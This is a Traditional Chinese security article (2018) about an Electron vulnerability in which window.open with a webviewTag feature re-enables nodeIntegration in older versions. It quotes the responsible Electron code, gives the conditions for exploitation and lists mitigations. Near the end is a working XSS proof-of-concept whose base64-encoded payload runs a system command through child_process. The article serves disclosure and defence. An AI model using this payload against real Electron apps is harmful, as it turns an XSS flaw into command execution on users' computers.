1周前，研究人員發現一個影響Electron所有版本的漏洞，利用該漏洞可以開啟nodeIntegration，這可能會造成遠程代碼執行。Electron是一個使用JavaScript,HTML和CSS等Web技術創建原生程序的框架，它負責比較難搞的部分，而用戶只需把精力放在應用的核心上即可。Slack、Discord、Signal、Atom、Visual Studio Code、Github桌面版等很多的應用都是用了Electron框架。

Electron是web應用，也就是說如果沒有正確對用戶輸入進行處理的話就可能會受到XSS腳本攻擊。默認的Electron應用不僅可以包含對自己API的訪問，還包含對所有Node.js植入模塊的訪問。這會讓XSS攻擊的危險變大，因為攻擊者的payload可以做很多的壞事，比如在客戶端執行系統命令等。Atom前不久就被曝類似的XSS漏洞。用戶可以將nodeIntegration: false傳入應用webPreferences中，來移除對Node.js的訪問。

還有一個webview的tag特征可以將內容嵌入到Electron應用中，并以獨立的進程運行。當使用webview tag時，你可以傳遞一些屬性值，其中就包括nodeIntegration。WebView容器默認是不開啟nodeIntegration的。文檔描述了如果webviewTag選項沒有在webPreferences中明確說明，就會繼承nodeIntegration的設定值的權限。

默認情況下，Electron會使用傳統的window.open()函數來創建一個BrowserWindow的新實例。子窗口默認會繼承父窗口的所有選項。傳統的window.open()函數允許用戶通過在featuresargument中傳遞一些值來修改繼承的選項的值：

if (!usesNativeWindowOpen) {// Make the browser window or guest view emit "new-window" event.window.open = function (url, frameName, features) {if (url != null && url !== '') {url = resolveURL(url)}const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features))if (guestId != null) {return getOrCreateProxy(ipcRenderer, guestId)} else {return null}}if (openerId != null) {window.opener = getOrCreateProxy(ipcRenderer, openerId)}
}

當Electron的window.open函數被調用，就會觸發一個ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN事件。該事件處理器會將這些特征進行語法分析，并把這些特征加入到新創建的窗口的選項中，然后觸發ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN事件。為了防止子窗口做壞事，guest-window-manager.js含有一個webPreferences選項的硬編碼的列表和限定值：

// Security options that child windows will always inherit from parent windowsconst inheritedWebPreferences = new Map([['contextIsolation', true],['javascript', false],['nativeWindowOpen', true],['nodeIntegration', false],['sandbox', true],['webviewTag', false]]);

ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN事件處理器調用mergeBrowserWindowOptions函數來確保父窗口webPreferences的限制屬性應用到子窗口：

 const mergeBrowserWindowOptions = function (embedder, options) {[...]// Inherit certain option values from parent windowfor (const [name, value] of inheritedWebPreferences) {if (embedder.getWebPreferences()[name] === value) {options.webPreferences[name] = value}}// Sets correct openerId here to give correct options to 'new-window' event handleroptions.webPreferences.openerId = embedder.idreturn options}

這就是該漏洞的核心。mergeBrowserWindowOptions函數并不會考慮到這些限制屬性的默認值是否定義過。或者說，如果webviewTag: false沒有在應用的webPreferences中明確定義，當mergeBrowserWindowOptions函數檢查webview Tag時，就會返回undefined，讓上面的if判斷返回錯誤，就不會應用父窗口的webviewTag preference。這會讓window.open以額外特征的方式傳遞webview Tag選項，重新開啟nodeIntegration，并最終導致潛在的遠程代碼執行。

POC

下面的POC說明了XSS payload如何在運行時重新開啟nodeIntegration，并執行系統命令：

<script>var x = window.open('data://yoloswag','','webviewTag=yes,show=no');x.eval("var webview = new WebView;"+"webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+"webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+"document.body.appendChild(webview)");</script>

poc執行的條件為：

· Electron應用的nodeIntegration是關閉的；

· 含有沒有適當處理用戶輸入的XSS漏洞或其他依賴該應用的漏洞；

· Electron 版本< 1.7.13, < 1.8.4, 或 < 2.0.0-beta.3；

· 沒有在webPreferences中聲明webviewTag: false；

· 或沒有在webPreferences中開啟nativeWindowOption選項；

· 或沒有用選項tag來攔截新窗口時間或覆寫 event.newGuest。

如果以上條件滿足，那么POC就可以在有漏洞的Electron版本上遠程代碼執行。

原文發布時間為：2018-05-18

本文來自云棲社區合作伙伴“嘶吼網”，了解相關信息可以關注“嘶吼網”。